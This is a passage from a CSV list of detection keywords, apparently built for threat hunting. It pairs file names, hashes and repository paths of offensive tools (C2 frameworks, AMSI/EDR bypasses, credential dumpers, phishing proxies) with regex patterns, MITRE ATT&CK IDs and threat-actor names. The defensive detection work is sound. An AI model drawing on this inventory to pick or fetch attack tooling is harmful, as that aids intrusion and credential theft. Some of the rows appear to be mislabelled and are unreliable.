Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*dcsyncclient.py*",".{0,1000}dcsyncclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*dcsyncclient.py*",".{0,1000}dcsyncclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*dd14d6cd273d756c527fc0fa4b55e5bc33518d51d713325846458df7894b0d24*",".{0,1000}dd14d6cd273d756c527fc0fa4b55e5bc33518d51d713325846458df7894b0d24.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*dd307d39038a79e45a140d13c406c084fceb840317a7c53a5d929012fa409cf3*",".{0,1000}dd307d39038a79e45a140d13c406c084fceb840317a7c53a5d929012fa409cf3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*dd3cd4783ec400f215c4f72f797fe310be12453c20944feec054a449835feb36*",".{0,1000}dd3cd4783ec400f215c4f72f797fe310be12453c20944feec054a449835feb36.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","0","N/A","8","2","195","29","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z" "*dd4543fa5f777ca9ad6ab6bf3d53cc8f186113da38d81159c776b1476eecb5e8*",".{0,1000}dd4543fa5f777ca9ad6ab6bf3d53cc8f186113da38d81159c776b1476eecb5e8.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*dd5cbddadb4446fe8e9558788ea449ac7f497973cf83ef9d8acc3803cfae956b*",".{0,1000}dd5cbddadb4446fe8e9558788ea449ac7f497973cf83ef9d8acc3803cfae956b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*dd6c8226641df9aa2a08e5e11949430e94773d763734ec3516a7976ad8d10f1a*",".{0,1000}dd6c8226641df9aa2a08e5e11949430e94773d763734ec3516a7976ad8d10f1a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*dd9203bd24970aceaa30d3241a10fd259380144e57a279021b4c4378fa6c5922*",".{0,1000}dd9203bd24970aceaa30d3241a10fd259380144e57a279021b4c4378fa6c5922.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*dd962b2de10f0a44beb1483ef05afce58151e471e9d0b79b7388f663292fd634*",".{0,1000}dd962b2de10f0a44beb1483ef05afce58151e471e9d0b79b7388f663292fd634.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*ddb178cbaaab362c61d3d061b366625d205f208553ddf341b1c8fae466e5bd6f*",".{0,1000}ddb178cbaaab362c61d3d061b366625d205f208553ddf341b1c8fae466e5bd6f.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*ddspoof*--enum-name-protection*",".{0,1000}ddspoof.{0,1000}\-\-enum\-name\-protection.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*ddspoof.py -*",".{0,1000}ddspoof\.py\s\-.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*DDSpoof\spoofer_config.py*",".{0,1000}DDSpoof\\spoofer_config\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*DDSpoof-main*",".{0,1000}DDSpoof\-main.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*de0565be5697d5543b8abb888a6d3d94d7cfb2538500b74ee38010f54f96a96a*",".{0,1000}de0565be5697d5543b8abb888a6d3d94d7cfb2538500b74ee38010f54f96a96a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*de09af73cc55f3dfbf6bf40493075b3c93765aa0ad88e34b568eac727f6b0c03*",".{0,1000}de09af73cc55f3dfbf6bf40493075b3c93765aa0ad88e34b568eac727f6b0c03.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*de569a85963dfe8966a51f5e5fdd9ecc9cbc30721fc2d624c4c29c6cf6d12adf*",".{0,1000}de569a85963dfe8966a51f5e5fdd9ecc9cbc30721fc2d624c4c29c6cf6d12adf.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*DE7B9E6B-F73B-4573-A4C7-D314B528CFCB*",".{0,1000}DE7B9E6B\-F73B\-4573\-A4C7\-D314B528CFCB.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*de81859bc3a1de8e35c2fa363f2405d7aff32f674cc3757caa1cc89235ec818e*",".{0,1000}de81859bc3a1de8e35c2fa363f2405d7aff32f674cc3757caa1cc89235ec818e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*deb.torproject.org/torproject.org/*",".{0,1000}deb\.torproject\.org\/torproject\.org\/.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*deb.torproject.org/torproject.org/*.asc*",".{0,1000}deb\.torproject\.org\/torproject\.org\/.{0,1000}\.asc.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*deb.torproject.org-keyring*",".{0,1000}deb\.torproject\.org\-keyring.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*debd82bfe5eaf80dfb9d254962df14431f231cde2c09b8efeeed73e4f263cd98*",".{0,1000}debd82bfe5eaf80dfb9d254962df14431f231cde2c09b8efeeed73e4f263cd98.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*debian-tor:x*",".{0,1000}debian\-tor\:x.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*DebugAmsi.exe*",".{0,1000}DebugAmsi\.exe.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","89","20","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" "*DebugAmsi.sln*",".{0,1000}DebugAmsi\.sln.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","89","20","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" "*DebugAmsi.vcxproj*",".{0,1000}DebugAmsi\.vcxproj.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","89","20","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" "*DebugAmsi-main*",".{0,1000}DebugAmsi\-main.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","89","20","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" "*DebugAmsix64.exe*",".{0,1000}DebugAmsix64\.exe.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","89","20","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" "*DebugAmsix86.exe*",".{0,1000}DebugAmsix86\.exe.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","89","20","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" "*Dec0ne/KrbRelayUp*",".{0,1000}Dec0ne\/KrbRelayUp.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","1","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*dece45d516d8421e39684618e0b571f94d31dfaf0d0d20d6f4593f4ab67edb0b*",".{0,1000}dece45d516d8421e39684618e0b571f94d31dfaf0d0d20d6f4593f4ab67edb0b.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*deckard@tyrellcorporation.io*",".{0,1000}deckard\@tyrellcorporation\.io.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*DecodeRDPCache.ps1*",".{0,1000}DecodeRDPCache\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*decoder-it/ADCSCoercePotato*",".{0,1000}decoder\-it\/ADCSCoercePotato.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","1","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*decoder-it/LocalPotato*",".{0,1000}decoder\-it\/LocalPotato.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*decoder-it/psgetsystem*",".{0,1000}decoder\-it\/psgetsystem.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","1","N/A","10","4","320","83","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z" "*decoder-it/TokenStealer*",".{0,1000}decoder\-it\/TokenStealer.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","1","N/A","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" "*Decode-RoutingPacket*",".{0,1000}Decode\-RoutingPacket.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1058","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*decoy_document.xls*",".{0,1000}decoy_document\.xls.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*decrypt.py .\*.txt utf-16-le*",".{0,1000}decrypt\.py\s\.\\.{0,1000}\.txt\sutf\-16\-le.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","0","N/A","10","6","567","85","2024-01-30T14:31:55Z","2019-04-09T07:41:42Z" "*decrypt_chrome_password(*",".{0,1000}decrypt_chrome_password\(.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*decrypt_chrome_password.py*",".{0,1000}decrypt_chrome_password\.py.{0,1000}","offensive_tool_keyword","decrypt-chrome-passwords","A simple program to decrypt chrome password saved on your machine.","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/ohyicong/decrypt-chrome-passwords","1","1","N/A","10","8","765","169","2024-02-08T20:07:35Z","2020-12-28T15:11:12Z" "*Decrypt-Bytes*",".{0,1000}Decrypt\-Bytes.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1056","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*decrypt-chrome-passwords-main*",".{0,1000}decrypt\-chrome\-passwords\-main.{0,1000}","offensive_tool_keyword","decrypt-chrome-passwords","A simple program to decrypt chrome password saved on your machine.","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/ohyicong/decrypt-chrome-passwords","1","1","N/A","10","8","765","169","2024-02-08T20:07:35Z","2020-12-28T15:11:12Z" "*Decrypt-CipherText*",".{0,1000}Decrypt\-CipherText.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - 